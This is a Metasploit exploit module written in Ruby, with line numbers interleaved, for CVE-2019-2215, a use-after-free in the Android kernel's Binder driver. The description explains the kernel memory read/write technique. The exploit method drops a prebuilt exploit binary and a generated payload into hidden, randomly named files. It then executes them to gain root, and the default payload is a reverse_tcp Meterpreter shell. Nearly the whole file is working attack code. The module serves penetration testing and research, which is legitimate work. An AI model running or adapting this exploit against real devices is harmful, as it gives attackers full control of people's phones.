1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Common
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Android Binder Use-After-Free Exploit',
19
        'Description' => %q{
20
          This module exploits CVE-2019-2215, which is a use-after-free in Binder in the
21
          Android kernel. The bug is a local privilege escalation vulnerability that
22
          allows for a full compromise of a vulnerable device. If chained with a browser
23
          renderer exploit, this bug could fully compromise a device through a malicious
24
          website.
25
          The freed memory is replaced with an iovec structure in order to leak a pointer
26
          to the task_struct. Finally the bug is triggered again in order to overwrite
27
          the addr_limit, making all memory (including kernel memory) accessible as part
28
          of the user-space memory range in our process and allowing arbitrary reading
29
          and writing of kernel memory.
30
        },
31
        'License' => MSF_LICENSE,
32
        'Author' => [
33
          'Jann Horn',    # discovery and exploit
34
          'Maddie Stone', # discovery and exploit
35
          'grant-h',      # Qu1ckR00t
36
          'timwr',        # metasploit module
37
        ],
38
        'References' => [
39
          [ 'CVE', '2019-2215' ],
40
          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
41
          [ 'URL', 'https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html' ],
42
          [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
43
          [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
44
        ],
45
        'DisclosureDate' => '2019-09-26',
46
        'SessionTypes' => [ 'meterpreter' ],
47
        'Platform' => [ 'android', 'linux' ],
48
        'Arch' => [ ARCH_AARCH64 ],
49
        'Targets' => [[ 'Auto', {} ]],
50
        'DefaultOptions' => {
51
          'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
52
          'WfsDelay' => 5
53
        },
54
        'DefaultTarget' => 0,
55
        'Compat' => {
56
          'Meterpreter' => {
57
            'Commands' => %w[
58
              stdapi_fs_getwd
59
            ]
60
          }
61
        },
62
        'Notes' => {
63
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
64
          'Reliability' => [ UNRELIABLE_SESSION ],
65
          'Stability' => [ CRASH_SAFE ]
66
        }
67
      )
68
    )
69
  end
70

71
  def upload_and_chmodx(path, data)
72
    write_file(path, data)
73
    chmod(path)
74
    register_file_for_cleanup(path)
75
  end
76

77
  def exploit
78
    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-2215', 'exploit')
79
    exploit_data = File.read(local_file, mode: 'rb')
80

81
    workingdir = session.fs.dir.getwd
82
    exploit_file = "#{workingdir}/.#{Rex::Text.rand_text_alpha_lower(5)}"
83
    upload_and_chmodx(exploit_file, exploit_data)
84
    payload_file = "#{workingdir}/.#{Rex::Text.rand_text_alpha_lower(5)}"
85
    upload_and_chmodx(payload_file, generate_payload_exe)
86

87
    print_status("Executing exploit '#{exploit_file}'")
88
    result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
89
    print_status("Exploit result:\n#{result}")
90
  end
91
end
92

93